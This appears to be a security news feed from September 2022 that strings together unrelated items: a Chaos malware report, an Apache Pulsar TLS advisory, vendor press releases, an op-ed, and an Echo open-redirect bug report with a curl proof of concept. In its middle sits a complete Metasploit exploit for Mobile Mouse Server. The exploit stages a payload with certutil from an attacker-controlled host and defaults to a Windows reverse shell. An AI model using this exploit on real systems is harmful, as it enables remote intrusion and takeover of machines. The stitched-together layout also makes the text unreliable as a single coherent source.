The previously identified ransomware builder has veered in an entirely new direction, targeting consumers and business of all sizes by exploiting known CVEs through brute-forced and/or stolen SSH keys.

The powerful Chaos malware has evolved yet again, morphing into a new Go-based, multiplatform threat that bears no resemblance to its previous ransomware iteration. It's now targeting known security vulnerabilities to launch distributed denial-of-service (DDoS) attacks and perform cryptomining.

Researchers from Black Lotus Labs, the threat intelligence arm of Lumen Technologies, recently observed a version of Chaos written in Chinese, leveraging China-based infrastructure, and exhibiting behavior far different than the last activity seen by the ransomware-builder of the same name, they said in a blog post published Sept. 28.

Indeed, the distinctions between earlier variants of Chaos and the 100 distinct and recent Chaos clusters that researchers observed are so different that they say it poses a brand-new threat. In fact, researchers believe the latest variant is actually the evolution of the DDoS botnet Kaiji and perhaps "distinct from the Chaos ransomware builder" previously seen in the wild, they said.

Kaiji, discovered in 2020, originally targeted Linux-based AMD and i386 servers by leveraging SSH brute-forcing to infect new bots and then launch DDoS attacks. Chaos has evolved Kaiji's original capabilities to include modules for new architectures — including Windows — as well as adding new propagation modules through CVE exploitation and SSH key harvesting, the researchers said.

**Recent Chaos Activity**

In recent activity, Chaos successfully compromised a GitLab server and unfurled a flurry of DDoS attacks targeting the gaming, financial services and technology, and media and entertainment industries, along with DDoS-as-a-service providers and a cryptocurrency exchange.

Chaos is now targeting not only enterprise and large organizations but also "devices and systems that aren't routinely monitored as part of an enterprise security model, such as SOHO routers and FreeBSD OS," the researchers said.

And while the last time Chaos was spotted in the wild it was acting more as typical ransomware that entered networks with the purpose of encrypting files, the actors behind the latest variant have very different motives in mind, the researchers said.

Its cross-platform and device functionality as well as the stealth profile of the network infrastructure behind the latest Chaos activity appears to demonstrate that the aim of the campaign is to cultivate a network of infected devices to leverage for initial access, DDoS attacks, and cryptomining, according to the researchers.

**Key Differences, and One Similarity**

While previous samples of Chaos were written in .NET, the latest malware is written in Go, which is rapidly becoming a language of choice for threat actors due to its cross-platform flexibility, low antivirus detection rates, and difficulty to reverse-engineer, the researchers said.

And indeed, one of the reasons that the latest version of Chaos is so powerful is because it operates across multiple platforms, including not only Windows and Linux operating systems but also ARM, Intel (i386), MIPS, and PowerPC, they said.

It also propagates in a far different way than previous versions of the malware. While researchers were unable to ascertain its initial access vector, once it takes hold of a system, the latest Chaos variants exploit known vulnerabilities in a way that shows the ability to pivot quickly, the researchers noted.

"Among the samples we analyzed were reported CVEs for Huawei (CVE-2017-17215) and Zyxel (CVE-2022-30525) personal firewalls, both of which leveraged unauthenticated remote command line injection vulnerabilities," they observed in their post. "However, the CVE file appears trivial for the actor to update, and we assess it is highly likely the actor leverages other CVEs."

Chaos has indeed gone through numerous incarnations since it first emerged in June 2021 and this latest version is not likely to be its last, the researchers said. Its first iteration, Chaos Builder 1.0-3.0, purported to be a builder for a .NET version of the Ryuk ransomware, but the researchers soon noticed it bore little resemblance to Ryuk and was actually a wiper.

The malware evolved across several versions until version four of the Chaos builder that was released in late 2021 and got a boost when a threat group named Onyx created its own ransomware. This version quickly became the most common Chaos edition directly observed in the wild, encrypting some files but maintain overwritten and destroying most of the files in its path.

Earlier this year in May, the Chaos builder traded its wiper capabilities for encryption, surfacing with a rebranded binary dubbed Yashma that incorporated fully fledged ransomware capabilities.

While the most recent evolution of Chaos witnessed by Black Lotus Labs is far different, it does have one significant similarity with its predecessors — rapid growth that is unlikely to slow anytime soon, the researchers said.

The earliest certificate of the latest Chaos variant was generated on April 16; this is subsequently when researchers believe threat actors launched the new variant in the wild.

Since then, the number of Chaos self-signed certificates has shown "marked growth," more than doubling in May to 39 and then jumping to 93 for the month of August, the researchers said. As of Sept. 20, the current month has already surpassed the previous month's total with the generation of 94 Chaos certificates, they said.

**Mitigating Risk Across the Board**

Because Chaos is now attacking victims from the smallest home offices to the largest enterprises, researchers made specific recommendations for each type of target.

For those defending networks, they advised that network administrators stay on top of patch management for newly discovered vulnerabilities, as this is a principal way Chaos spreads.

"Use the IoCs outlined in this report to monitor for a Chaos infection, as well as connections to any suspicious infrastructure," the researchers recommended.

Consumers with small office and home office routers should follow best practices of regularly rebooting routers and installing security updates and patches, as well as leveraging properly configured and updated EDR solutions on hosts. These users also should regularly patch software by applying vendors' updates where applicable.

Remote workers — an attack surface that has significantly increased over the last two years of the pandemic — also are at risk, and should mitigate it by changing default passwords and disabling remote root access on machines that don't require it, the researchers recommended. Such workers also should store SSH keys securely and only on devices that require them.

For all businesses, Black Lotus Labs recommends considering the application of comprehensive secure access service edge (SASE) and DDoS mitigation protections to bolster their overall security postures and enable robust detection on network-based communications.

Chaos Malware Resurfaces With All-New DDoS & Cryptomining Modules

Clients vulnerable due to improper certificate validation

Emma Woollacott 28 September 2022 at 15:30 UTC  
Updated: 28 September 2022 at 16:20 UTC

Clients vulnerable due to improper certificate validation

A newly-discovered vulnerability in Apache Pulsar allows a remote attacker to carry out a manipulator-in-the-middle (MitM) attack due to improper certificate validation.

Apache Pulsar is a distributed, open source solution for server-to-server messaging and queuing built on the publisher-subscribe pattern.

It’s used by thousands of companies for high-performance data pipelines, microservices, instant messaging, data integrations, and more, managing hundreds of billions of events per day.

But a delay in the TLS hostname verification process in the Pulsar Java Client and the Pulsar Proxy, discovered by Michael Marshall of cloud database-as-a-service firm DataStax, makes each client vulnerable to a MitM middle attack.

Read more of the latest news about web security vulnerabilities

The vulnerability isn’t specific to the Pulsar protocol, but exists thanks to a fundamental weakness in TLS hostname verification that means that the protocol fails to enforce hostname verification.

The Pulsar Java Client sends its client certificate as part of its client authentication step, while the Pulsar Proxy sends its server certificate as part of its authentication step.

However, authentication data is sent before verifying that the server’s TLS certificate matches the hostname, meaning that authentication data could be exposed to an attacker.

**Attack method**

To take advantage of this vulnerability, an attacker would need to take control of a machine between the client and the server. They would then have to actively manipulate traffic to perform the attack by providing the client with a cryptographically valid certificate for an unrelated host.

And because the client sends authentication data before performing the hostname verification, it would be possible for the attacker to gain access to the client’s authentication data.

When the client verifies the hostname and establishes that the targeted hostname does not match a hostname on the certificate, the client eventually closes the connection.

This means that the value of the intercepted authentication data will depend on the authentication method used by the client, with token-based and username/password methods left vulnerable because the authentication data can be used to impersonate the client in a separate session.

The vulnerability, rated medium severity, affects Apache Pulsar Java Client versions 2.7.0 to 2.7.4; 2.8.0 to 2.8.3; 2.9.0 to 2.9.2; 2.10.0; and 2.6.4 and earlier.

Users are advised to upgrade to unaffected versions – 2.7.5, 2.8.4, 2.9.3, 2.10.1, or higher – and to rotate vulnerable authentication data, including tokens and passwords.

DataStax says it has alerted its customers to the flaw. “The Pulsar security issues have already been fixed for the DataStax Luna Streaming offering and will be in an update to our Astra Streaming service soon,” says a spokesperson.

RECOMMENDED Web security flaw in Sophos Firewall patched

Vulnerability in Apache Pulsar allowed manipulator-in-the-middle attacks

This Metasploit module utilizes the Mobile Mouse Server by RPA Technologies, Inc protocol to deploy a payload and run it from the server. This module will only deploy a payload if the server is set without a password (default). Tested against 3.6.0.4, the current version at the time of module writing.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = NormalRanking  include Exploit::Remote::Tcp  include Exploit::EXE # generate_payload_exe  include Msf::Exploit::Remote::HttpServer::HTML  include Msf::Exploit::FileDropper  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Mobile Mouse RCE',        'Description' => %q{          This module utilizes the Mobile Mouse Server by RPA Technologies, Inc protocol          to deploy a payload and run it from the server.  This module will only deploy          a payload if the server is set without a password (default).          Tested against 3.6.0.4, current at the time of module writing        },        'License' => MSF_LICENSE,        'Author' => [          'h00die', # msf module          'CHOKRI HAMMEDI' # edb        ],        'References' => [          [ 'EDB', '51010' ],          [ 'URL', 'https://mobilemouse.com/' ],        ],        'Arch' => [ ARCH_X64, ARCH_X86 ],        'Platform' => 'win',        'Stance' => Msf::Exploit::Stance::Aggressive,        'Targets' => [          ['default', {}],        ],        'Payload' => {          'BadChars' => "\x04\x1E"        },        'DefaultOptions' => {          'PAYLOAD' => 'windows/shell/reverse_tcp'        },        'DisclosureDate' => '2022-09-20',        'DefaultTarget' => 0,        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [ARTIFACTS_ON_DISK] # typing on screen        }      )    )    register_options(      [        OptPort.new('RPORT', [true, 'Port Mobile Mouse runs on', 9099]),        OptInt.new('SLEEP', [true, 'How long to sleep between commands', 3]),        OptString.new('PATH', [true, 'Where to stage payload for pull method', 'c:\\Windows\\Temp\\']),        OptString.new('CLIENTNAME', [false, 'Name of client, this shows up in the logs', '']),      ]    )  end  def path    return datastore['PATH'] if datastore['PATH'].end_with? '\\'    "#{datastore['PATH']}\\"  end  def connect_command    connect_command = 'CONNECT' # 434F4E4E454354    connect_command << "\x1E\x1E"    connect_command << @client_name    connect_command << "\x1E"    connect_command << 'iPhone' # 6950686F6E65    connect_command << "\x1E"    # the next 2,2 may be a version number of some sort    connect_command << '2' # 32    connect_command << "\x1E"    connect_command << '2' # 32    connect_command << "\x1E\x04"    sock.put(connect_command)    sleep(datastore['SLEEP'])  end  def open_command_prompt    open_command_prompt = 'KEY' # 4b4559    open_command_prompt << "\x1E"    open_command_prompt << '114' # 313134 windows key?    open_command_prompt << "\x1E"    open_command_prompt << 'r' # 72    open_command_prompt << "\x1E"    open_command_prompt << 'OPT' # 4f5054    open_command_prompt << "\x04"    sock.put(open_command_prompt)    sleep(datastore['SLEEP'])  end  def script_content(payload)    script_content = 'KEY' # 4B4559    script_content << "\x1E"    script_content << '100' # 313030    script_content << "\x1E"    script_content << payload    script_content << "\x1E\x04"    script_content << 'KEY' # 4B4559    script_content << "\x1E"    script_content << '-1' # 2d31    script_content << "\x1E"    script_content << 'ENTER' # 454e544552    script_content << "\x1E\x04"    sock.put(script_content)    sleep(datastore['SLEEP'])  end  def on_request_uri(cli, _req)    p = generate_payload_exe    send_response(cli, p)    print_good("Payload request received, sending #{p.length} bytes of payload for staging")  end  def check    if datastore['CLIENTNAME'].blank?      @client_name = Rex::Text.rand_text_alphanumeric(5..10).to_s      print_status("Client name set to: #{@client_name}")    else      @client_name = datastore['CLIENTNAME']    end    connect    print_status('Connecting')    connect_command    res = sock.get_once    if res.nil?      return CheckCode::Unknown('No response received from target')    end    disconnect    res = res.split("\x1E")    if res[1] == 'NO'      return CheckCode::Safe("Unable to connect, server response: #{res[4]}")    end    CheckCode::Appears("Connected to hostname #{res[3]} with MAC address #{res[5]}")  end  def exploit    if datastore['CLIENTNAME'].blank?      @client_name = Rex::Text.rand_text_alphanumeric(5..10).to_s      print_status("Client name set to: #{@client_name}")    else      @client_name = datastore['CLIENTNAME']    end    connect    print_status('Connecting')    connect_command    res = sock.get_once    if res.nil?      fail_with(Failure::Disconnected, 'No response received from target')    end    res = res.split("\x1E")    if res[1] == 'NO'      fail_with(Failure::NoAccess, "Unable to connect, server response: #{res[4]}")    end    vprint_good("Connected to hostname #{res[3]} with MAC address #{res[5]}")    print_status('Opening Command Prompt')    open_command_prompt    # for whatever reason, if we don't read here the server doesn't want to keep playing with us, so read but throw away    sock.get_once    print_status('Sending stager')    filename = Rex::Text.rand_text_alphanumeric(rand(8..17)) + '.exe'    register_file_for_cleanup("#{path}#{filename}")    # I attempted to put this all in one, stage, run, exit, but it was never successful, so we'll keep it in 2    stager = "certutil.exe -urlcache -f http://#{datastore['lhost']}:#{datastore['SRVPORT']}/ #{path}#{filename}"    start_service('Path' => '/') # start webserver    script_content(stager)    print_status('Opening Command Prompt again')    open_command_prompt    print_status('Executing payload')    script_content("#{path}#{filename} && exit")    handler    disconnect    sleep(datastore['SLEEP'] * 2) # give time for it to do its thing before we revert  endend

Mobile Mouse Remote Code Execution

Illumio Endpoint extends zero trust segmentation to see risk and set policy across macOS and Windows devices.

**Sunnyvale, Calif., Sept. 28, 2022 —** Illumio, Inc., the Zero Trust Segmentation company, today announced Illumio Endpoint®, a reimagined way to prevent breaches from spreading to clouds and data centers from laptops.

Hybrid work has expanded the attack surface, introducing new threats and making organizations more vulnerable, so it’s become increasingly important for employees to have secure access to applications and data wherever they are located. Unlike other Zero Trust Segmentation solutions, Illumio Endpoint lets your policy follow your teams’ laptops wherever they work, whether at home, in the office, or at a coffee shop. With Illumio Endpoint, the first device that gets infected will also be the last.

Organizations are more interconnected and vulnerable in hybrid workplaces, and the attack surface is growing increasingly complex. Additionally, attacks on hybrid work environments are more expensive, costing an average of about $600K more than the global average. Even with endpoint detection and response tools in place, endpoints still get breached — according to ESG, 76% of organizations experienced a ransomware attack in the past two years alone.

Illumio Endpoint includes:

· Extended visibility and segmentation policy controls for macOS and Windows devices, allowing organizations to see risk and stop attacks from spreading from laptops, workstations, and VDIs.

· A single, unified console to see and manage visibility and segmentation policy across endpoints, clouds, and data centers, making Zero Trust Segmentation easier, faster, and more efficient for security teams.

· Work from anywhere supports with segmentation policy that follows the device, so organizations have the confidence that their networks are secure, and their employees can remain productive while working from anywhere.

· The ability to control application access so users can only reach the necessary applications from their device, not the entire data center and cloud, minimizing the organization's risk from vulnerable or compromised endpoints.

  
"Before Illumio, we had only a slim idea of what kind of communications were running across our network. But with Illumio, we clearly see exactly what's connecting to individual endpoints,” said David Ault, VP of Information Security at Telhio Credit Union.

“The hybrid workforce is here to stay, which exposes organizations to a more complex attack surface and more risk, particularly on the endpoint,” said Mario Espinoza, Chief Product Officer at Illumio. “It’s important to have tools that can detect and respond to an identified breach, but unidentified attacks can spread throughout the organization to access critical data and assets when Zero Trust Segmentation is not in place to proactively contain the breach. With Illumio Endpoint, security leaders will gain the comprehensive protection needed to build resilience to attacks throughout their hybrid IT and as employees work from anywhere.”

“Ransomware and other cyberattacks often involve end user devices somewhere in the attack chain, moving laterally on to other higher-value assets,” said Dave Gruber, Principal Analyst, ESG. “Because attackers continue to find ways in and move laterally fast, prevention, detection and response mechanisms can fall short stopping these fast-moving attacks. Containment strategies such as Zero Trust Segmentation across endpoint devices can proactively stop ransomware and other fast-moving attacks from spreading to critical infrastructure and assets, reducing risk.”

To learn more about Illumio Endpoint visit: https://www.illumio.com/products/illumio-endpoint.

**About Illumio** 

Illumio, the Zero Trust Segmentation company, stops breaches and ransomware from spreading across the hybrid attack surface. The Illumio ZTS Platform visualizes all traffic flows between workloads, devices and the internet, automatically sets granular segmentation policies to control communications, and isolates high-value assets and compromised systems proactively or in response to active attacks. Illumio protects organizations of all sizes, from Fortune 100 to small business, by stopping breaches and ransomware in minutes, saving millions of dollars in application downtime, and accelerating cloud and digital transformation projects.

Illumio Introduces New Solution to Stop Endpoint Ransomware from Spreading Across the Hybrid Attack Surface

ZecOps extends Jamf's mobile security capabilities by adding advanced detections and incident response.

**MINNEAPOLIS, Sept. 26, 2022 (GLOBE NEWSWIRE) —** Jamf (NASDAQ: JAMF), the standard in Apple Enterprise Management, today announced it signed a definitive agreement to acquire ZecOps Inc., a leader in mobile detection and response.

This acquisition uniquely positions Jamf to help IT and security teams strengthen their organization's mobile security posture, accelerating mobile security investigations from weeks to minutes, leverage known indicators of compromise (IOC) at-scale, and identify sophisticated 0- or 1-click attacks on a much deeper scale.

"I am very excited to bring ZecOps' market-leading advanced mobile detection and response capabilities into the Jamf platform," said Dean Hager, CEO, Jamf. "We believe ZecOps has built a differentiated solution that meets a very important need for many organizations — the ability to thoroughly detect and investigate threats that target mobile users so they can confidently use these powerful devices for work. This capability further propels our goal of continuing to bridge the gap between what Apple provides and the enterprise requires."

Mobile devices now account for 59% of global website traffic, and according to the 2022 Verizon Mobile Security Index, close to half (45%) of companies said that they have suffered a compromise involving a mobile device in the past 12 months.

ZecOps will bring important capabilities to the Jamf platform to help address the growing trend of targeted mobile attacks. Jamf offers robust management and mobile security capabilities for iOS devices; however, access to deeper insights into potential security exploits is technically challenging and requires physical access to the device, which is difficult in a remote work environment. ZecOps is a robust, unparalleled solution that provides the deepest layer of insight and assurance for security-conscious customers with high-value targets that need something more. ZecOps provides the same level of visibility currently available for macOS through Jamf Protect but for iOS, making it capable of detecting the kinds of sophisticated mobile threats that Apple's Lockdown mode aims to prevent. With ZecOps, users can have both Lockdown mode and ZecOps software operating at the same time.

**Advanced threat hunting on mobile devices**  
Advanced protection of mobile devices requires a layered approach. Proactive investigation and analysis complement device management and mobile threat defense for more advanced detections and preventative protections. ZecOps enables advanced threat hunting by capturing and analyzing logs from iOS and Android devices at the operating system layer, allowing security operations and incident response teams to perform automatic or on-demand mobile cyber investigations.

**Digital forensics and incident response**  
Security teams are already drowning in data. Event logs, analyst reports, third-party threat intelligence feeds, and more are produced regularly for applications, endpoints, and network infrastructure. Mobile has historically been left out of this data feed. Many investigation teams lack expertise in modern mobile platforms. ZecOps' sophisticated digital forensics capabilities provides Security Operation Center (SOC) teams with unique mobile threat intelligence to uncover zero-day attacks. ZecOps does the heavy lifting for SOC teams, saving months of work per investigation. The solution automatically constructs a timeline of suspicious events and indicators of compromise to demonstrate when and how a device was impacted.

**Privacy conscious**  
Data privacy is extremely important to Jamf. ZecOps shares Jamf's commitment to safeguarding user data by ensuring log collection doesn't include the user's material personal data such as photos, videos, text messages and call logs, and only leveraging low-level system information and diagnostics data to the cloud for analysis. ZecOps analysis can also take place on-premises to meet various organizations' and governments data privacy requirements.

"We founded ZecOps to catch hidden 0-click and 1-click attacks," said Zuk Avraham, co-founder and CEO, ZecOps. "By combining with Jamf, we can offer our customers a truly powerful mobile threat intelligence and threat hunting capabilities that will keep up with the evolving threat landscape without compromising the user experience."

This transaction is subject to the satisfaction of customary closing conditions and is expected to close in the fourth quarter. Terms of the transaction were not disclosed.

**About Jamf**  
Jamf's purpose is to simplify work by helping organizations manage and secure an Apple experience that end users love and organizations trust. Jamf is the only company in the world that provides a complete management and security solution for an Apple-first environment that is enterprise secure, consumer simple and protects personal privacy. To learn more, visit www.jamf.com.

**About ZecOps**  
ZecOps develops the world's most powerful platform to discover and analyze mobile cyber attacks. Used by world-leading enterprises, governments and individuals globally, ZecOps Mobile Detection and Response platform provides a realistic and scalable approach to mobile threat hunting. ZecOps enables automated discovery of 0-day attacks and Advanced Persistent Threats (APTs), delivering anti cyber-espionage capabilities within minutes.

**Forward-Looking Statements**  
This release relates to a pending acquisition of ZecOps, Inc. ("ZecOps") by Jamf Holding Corp. ("Jamf", "we", our" or "us"). This release contains forward-looking statements within the meaning of the "safe harbor" provisions of the Private Securities Litigation Reform Act of 1995, regarding the anticipated benefits of the acquisition, and the anticipated impacts of the acquisition on our business, products, financial results, and other aspects of our and ZecOps' operations. You can identify forward-looking statements by the fact that they do not relate strictly to historical or current facts. These statements may include words such as "anticipate," "estimate," "expect," "project," "plan," "intend," "believe," "may," "will," "should," "can have," "likely," and other words and terms of similar meaning in connection with any discussion of the timing or nature of future operating or financial performance or other events. These risks, uncertainties, assumptions, and other factors include, but are not limited to: the effect of the announcement of the acquisition on the ability of Jamf or ZecOps to retain key personnel or maintain relationships with customers, vendors, developers, community members, and other business partners; risks that the acquisition disrupts current plans and operations; the ability of the parties to consummate the acquisition on a timely basis or at all; the satisfaction of the conditions precedent to consummation of the acquisition; our ability to successfully integrate ZecOps' operations; our and ZecOps' ability to execute on our business strategies relating to the acquisition and realize expected benefits and synergies; and our ability to compete effectively, including in response to actions our competitors may take following announcement of the acquisition. Further information on these and additional risks, uncertainties, and other factors that could cause actual outcomes and results to differ materially from those included in or contemplated by the forward-looking statements contained in this release are included under the caption "Forward-Looking Statements" and elsewhere in our Form 10-Q for the quarter ended June 30, 2022, and other filings and reports we make with the Securities and Exchange Commission from time to time. Moreover, both we and ZecOps operate in a very competitive and rapidly changing environment, and new risks may emerge from time to time. It is not possible for us to predict all risks, nor can we assess the impact of all factors on our business or the acquisition, or the extent to which any factor, or combination of factors, may cause actual results or outcomes to differ materially from those contained in any forward-looking statements we may make. Forward-looking statements speak only as of the date the statements are made and are based on information available to us at the time those statements are made and/or our management's good faith belief as of that time with respect to future events. Except as required by law, we undertake no obligation, and do not intend, to update these forward-looking statements.

SOURCE: Jamf

Jamf Announces Intent to Acquire ZecOps, to Provide a Market-Leading Security Solution for Mobile Devices as Targeted Attacks Continue to Grow

Labstack Echo v4.8.0 was discovered to contain an open redirect vulnerability via the Static Handler component. This vulnerability can be leveraged by attackers to cause a Server-Side Request Forgery (SSRF).

**Issue Description**

301 redirect and may further cause ssrf

see:  
go-macaron/macaron#198

also see:  
diango CVE-2018-14574

package main

import (
	"github.com/labstack/echo/v4"
)

func main() {
	e := echo.New()
	e.Static("/", "./")
	e.Logger.Fatal(e.Start(":1323"))
}

D:\\> curl -Lv http://127.0.0.1:1323//ruokeqx.gitee.io%2f..
\*   Trying 127.0.0.1:1323...
\* Connected to 127.0.0.1 (127.0.0.1) port 1323 (#0)
\> GET //ruokeqx.gitee.io%2f.. HTTP/1.1
\> Host: 127.0.0.1:1323
\> User-Agent: curl/7.83.1
\> Accept: \*/\*
\>
\* Mark bundle as not supporting multiuse
< HTTP/1.1 301 Moved Permanently
< Location: //ruokeqx.gitee.io/../
< Date: Sun, 04 Sep 2022 18:47:04 GMT
< Content-Length: 0
<
\* Connection #0 to host 127.0.0.1 left intact
\* Clear auth, redirects to port from 1323 to 80
\* Issue another request to this URL: 'http://ruokeqx.gitee.io/'
\*   Trying 212.64.63.190:80...
\* Connected to ruokeqx.gitee.io (212.64.63.190) port 80 (#1)
\> GET / HTTP/1.1
\> Host: ruokeqx.gitee.io
\> User-Agent: curl/7.83.1
\> Accept: \*/\*
\>
\* Mark bundle as not supporting multiuse
< HTTP/1.1 301 Moved Permanently
< Date: Sun, 04 Sep 2022 18:47:03 GMT
< Content-Type: text/html
< Content-Length: 182
< Connection: keep-alive
< Server: openresty
< Location: https://ruokeqx.gitee.io/
< Expires: Mon, 05 Sep 2022 18:47:03 GMT
< Cache-Control: max-age=86400
<
\* Ignoring the response-body
\* Connection #1 to host ruokeqx.gitee.io left intact
\* Clear auth, redirects to port from 80 to 443
\* Issue another request to this URL: 'https://ruokeqx.gitee.io/'
\*   Trying 212.64.63.190:443...
\* Connected to ruokeqx.gitee.io (212.64.63.190) port 443 (#2)
\* schannel: disabled automatic use of client certificate
\* ALPN: offers http/1.1
\* ALPN: server accepted http/1.1
\> GET / HTTP/1.1
\> Host: ruokeqx.gitee.io
\> User-Agent: curl/7.83.1
\> Accept: \*/\*
\>
\* schannel: failed to decrypt data, need more data
\* schannel: failed to decrypt data, need more data
\* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Date: Sun, 04 Sep 2022 18:47:04 GMT
< Content-Type: text/html
< Content-Length: 94632
< Connection: keep-alive
< Server: openresty
< Last-Modified: Sun, 04 Sep 2022 17:49:25 GMT
< ETag: "6314e525-171a8"
< Expires: Mon, 05 Sep 2022 18:47:04 GMT
< Cache-Control: max-age=86400
< Accept-Ranges: bytes
<
<!DOCTYPE html\>
...

CVE-2022-40083: vulnerability: open redirect in static handler · Issue #2259 · labstack/echo

The "single pane of glass" that gathers and correlates all the information security professionals need doesn't exist, so it's up to us to create it.

When the Bloomberg Terminal was introduced in 1982, it changed Wall Street forever. The Terminal was a computing marvel, aggregating and correlating more data than ever imagined. From market data to global currencies, commodities and real estate to policy and politics, investors and traders had for the first time a centralized data platform for real-time, multidimensional visibility and analysis. 

After seeing the field differently, users developed new proprietary strategies that led to an explosion in new products, such as index options and mortgage-backed securities. Data analysis kicked off an age of discovery, and it made Wall Street the place to be in the 1980s and beyond.

Today, data analysis is a critical component of any cybersecurity program. Security teams must sift through a dizzying array of inputs and issues in order to separate the signals and noise. They must differentiate between legitimate and malicious activity and prioritize where to take action to mitigate risk and battle adversaries to protect their businesses and customers.

One could argue that artificial intelligence (AI) and machine learning (ML) are leading the much-needed age of advancement in cybersecurity. But thousands of companies are using AI and ML to develop thousands of cybersecurity solutions. Siloed implementations by vendors that have little incentive to collaborate have created massive complexity that ultimately still leaves businesses vulnerable to attacks and exploits. 

The Bloomberg Terminal for cybersecurity — the "single pane of glass" that gathers and correlates all the relevant information security professionals need to do their jobs efficiently — doesn't yet exist. So enterprises are left grappling with where they should begin.

**Protect the Most Critical Asset First**

The approach we have been using to reduce business risk and protect critical assets is not working or scaling to meet the complexity of today's environment or the attack landscape. The focus has been on protecting the infrastructure, the data center, and the devices using a complex web of barriers to limit access. Despite the attention that zero-trust security architectures have received, it seems that as an industry, we struggle to turn the rhetoric into architecture. Businesses are encouraged to move away from moats and castles and toward securing access and applications, but practitioners still tend to focus on building fences around their most critical assets instead of securing the assets themselves.

Yet data is arguably the enterprise's most important asset. Data breaches exposed 21 billion records in 2021. This is why cybercriminals target it and governments around the world regulate it. The business consequences of a data breach have never been higher. According to the 2022 "Cost of a Data Breach" report from IBM and Ponemon, the average cost of a data breach rose to a record $4.35 million in 2022.

As the enterprise transitions to the cloud, this shift dramatically increases the threat surface of an organization, since much of this activity is outside the visibility of the security teams. "The cloud" no longer means a public cloud vendor or two. The modern enterprise environment involves on-prem services, multiple cloud services, software as a service (SaaS), infrastructure as a service (IaaS), and platform as a service (PaaS) all securing managed and unmanaged devices, with hybrid employees and third parties all requiring access to business assets. Security professionals have no way to see it all, certainly not in a dashboard view.

**Protect the Whole Enterprise**

Few organizations speak with more CISOs than Gartner. According to "Gartner Predicts 2022," consolidated security platforms are the future:

_Vendors are increasingly divided into 'platform' and 'portfolio' camps, with the former integrating tools to make a whole that's greater than the sum of the parts, and the latter packaging products with little integration. Technology consolidation is not limited to one technology area or even to a closely related set of technologies; these consolidations are happening in parallel across many security areas._

The Bloomberg Terminal for cybersecurity may never exist in the way security professionals dream about, so it'll be up to them to envision and create their own version. This is harder than it might seem, as evidenced by the increasing disillusionment security practitioners feel with their security information and management (SIEM) implementations — where big data leads to big bills but not deep insights — and the growth of more specialized event management and extended detection and response (XDR) solutions. This will require a review of that sea of options to select the tools that make the most sense for each layer of the enterprise.

Could we end up with a handful of platforms built on open standards? For the sake of enterprise risk, and the people doing the work, let's hope so.

When Will Cybersecurity Get Its Bloomberg Terminal?

Malwarebytes achieves 250% year-over-year MSP partner growth, introduces new modules to enhance protection, detection, and resolution of threats for SMBs.

**SANTA CLARA, Calif., Sept. 27, 2022 / PRNewswire/ —** MalwarebytesTM, a global leader in real-time cyber protection, continues to expand its OneView platform capabilities as well as rapidly grow the company's Managed Service Provider (MSP) program. In addition to best-in-class endpoint security, MSPs can now access vulnerability assessment, patch management, and Domain Name System (DNS) filtering from Malwarebytes OneView.

"At Malwarebytes, we aim to serve the underserved, which is what our MSP partners are doing every day for SMBs," said Brian Thomas, Vice President of Worldwide MSP & Channel Programs at Malwarebytes. "I joined Malwarebytes with ambitious plans that are coming to life through our amazing team and unwavering commitment to help both new and existing MSP partners keep their clients safe while catapulting their businesses to new heights."

Delivering high-quality cybersecurity services and keeping customer environments free from malware requires a skilled team that can provide 24x7 coverage. Yet, many MSPs face constrained staff resources, skyrocketing costs and complexities of managing multiple solutions to uncover hidden threats. Today's MSPs require streamlined and simplified solutions to help them keep pace.

The Malwarebytes OneView platform empowers MSPs to deliver enterprise-class endpoint security products that drastically reduce customer malware infections and ransomware exposure. The easy-to-manage platform allows security analysts of all skill levels to be effective from a centralized cloud-based console. With different levels of protection capabilities and threat prevention modules, MSPs can offer the right product or service to each customer, tailored to their specific needs.

This quarter, Malwarebytes has continued to build upon OneView, adding three new modules that simplify breach prevention within the same cloud interface MSPs already trust for detection and remediation:

*   **Vulnerability and Patch Management**, which enables MSPs to take control of their full patching process, helping ensure defenses are up to date across their clients' environments.
*   **DNS Filtering**, which empowers organizations to regulate access to websites and other content on company-managed networks, which in turn reinforces the security of company data.
*   **Vulnerability Assessment**, which helps users understand exposure, identify vulnerabilities, and prioritize actions to update defenses across device and server operating systems and a wide range of third-party applications.

"The continued expansion of the OneView platform empowers us to help our customers with enhanced protection modules and expert support, reducing investments in time and resources needed to protect their organizations against increasingly complex vulnerabilities," said Daniel Mitchell, CEO of Alt-Tech. "Our partnership with Malwarebytes means stronger and simpler protection for our SMB customers, helping them successfully navigate potential threats."

Malwarebytes' initial MSP Program and OneView showed significant traction, resulting in over 250% YOY growth, with more than 2,700 new global MSP partners and strategic partnerships with Addigy, Atera, ConnectWise, Datto, GCN Group, Kaseya, Sherweb, TeamViewer and regional partner Soft Solutions. Based on business demand and future growth projections, Malwarebytes added more than 30 employees in the last six months across the MSP team, including Nadia Karatsoreos, who is dedicated to empowering MSPs to profitably grow their businesses. The company plans to continue expanding the MSP Program with further product innovation as well as additional resources and training.

"I am thrilled to be joining the Malwarebytes team during this pivotal time," said Nadia Karatsoreos, Senior MSP Growth Strategist at Malwarebytes. "MSPs have been tasked with keeping their clients safe from cyber threats, which is not an easy feat. They not only need the tools but also a supportive vendor so they can confidently sell and serve their customers. I'm so excited that I get to continue to help MSPs grow their businesses."

To read more about the latest threats and cyber protection strategies, visit our newsroom, or follow us on Facebook, Instagram, LinkedIn, TikTok, and Twitter.

**About Malwarebytes  
**Malwarebytes believes that when people and organizations are free from threats, they are free to thrive. Founded in 2008, Malwarebytes CEO Marcin Kleczynski had one mission: to rid the world of malware. Today, that mission has expanded to provide cyber protection for everyone. Malwarebytes provides consumers and organizations with device protection, privacy, and prevention through effective, intuitive, and inclusive solutions in the home, on-the-go, at work, or on campus. A world-class team of threat researchers and security experts enable Malwarebytes to protect millions of customers and combat existing and never-before-seen threats using artificial intelligence and machine learning to catch new threats rapidly. These capabilities have been lauded by independent third parties including, among others, MITRE Engenuity, MRG Effitas, AV-TEST (consumer and business), G2 Crowd and CNET. With threat hunters and innovators across the world, the company is headquartered in California with offices in Europe and Asia. For more information, visit https://www.malwarebytes.com.

**SOURCE:** Malwarebytes

Malwarebytes Expands OneView Platform for MSPs

